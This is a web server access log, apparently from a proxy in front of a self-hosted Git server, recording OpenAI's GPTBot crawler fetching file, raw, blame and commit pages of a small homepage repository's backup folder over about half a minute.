"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" +[17/Feb/2026:14:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" +[17/Feb/2026:14:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" [Client 74.7.227.38] [Length 14216] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" +[17/Feb/2026:14:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" [Client 74.7.227.38] [Length 14236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" +[17/Feb/2026:14:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" [Client 74.7.227.38] [Length 14390] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" +[17/Feb/2026:14:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" [Client 74.7.227.38] [Length 14389] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" +[17/Feb/2026:14:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" [Client 74.7.227.38] [Length 13000] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" +[17/Feb/2026:14:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" [Client 74.7.227.38] [Length 12999] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" +[17/Feb/2026:14:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" [Client 74.7.227.38] [Length 9852] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" +[17/Feb/2026:14:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" [Client 74.7.227.38] [Length 9852] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" +[17/Feb/2026:14:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11897] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" +[17/Feb/2026:14:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11898] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" +[17/Feb/2026:14:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" [Client 74.7.227.38] [Length 11043] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" +[17/Feb/2026:14:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11648] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11647] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" +[17/Feb/2026:14:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" +[17/Feb/2026:14:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11520] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11520] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" [Client 74.7.227.38] [Length 11342] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" [Client 74.7.227.38] [Length 11342] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:34:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:34:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" +[17/Feb/2026:14:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" +[17/Feb/2026:14:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" +[17/Feb/2026:14:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" [Client 74.7.227.38] [Length 13283] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" +[17/Feb/2026:14:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" [Client 74.7.227.38] [Length 13283] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" +[17/Feb/2026:14:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" +[17/Feb/2026:14:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" +[17/Feb/2026:14:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" +[17/Feb/2026:14:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" +[17/Feb/2026:14:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" +[17/Feb/2026:14:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" +[17/Feb/2026:14:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" [Client 74.7.227.38] [Length 10362] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" [Client 74.7.227.38] [Length 10361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" [Client 74.7.227.38] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" +[17/Feb/2026:14:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" +[17/Feb/2026:14:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10860] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" +[17/Feb/2026:14:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10859] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" +[17/Feb/2026:14:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" [Client 74.7.227.38] [Length 10979] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" +[17/Feb/2026:14:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" [Client 74.7.227.38] [Length 10979] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" +[17/Feb/2026:14:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10805] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" +[17/Feb/2026:14:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11495] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10805] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" +[17/Feb/2026:14:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11495] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" [Client 74.7.227.38] [Length 10603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" [Client 74.7.227.38] [Length 10605] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 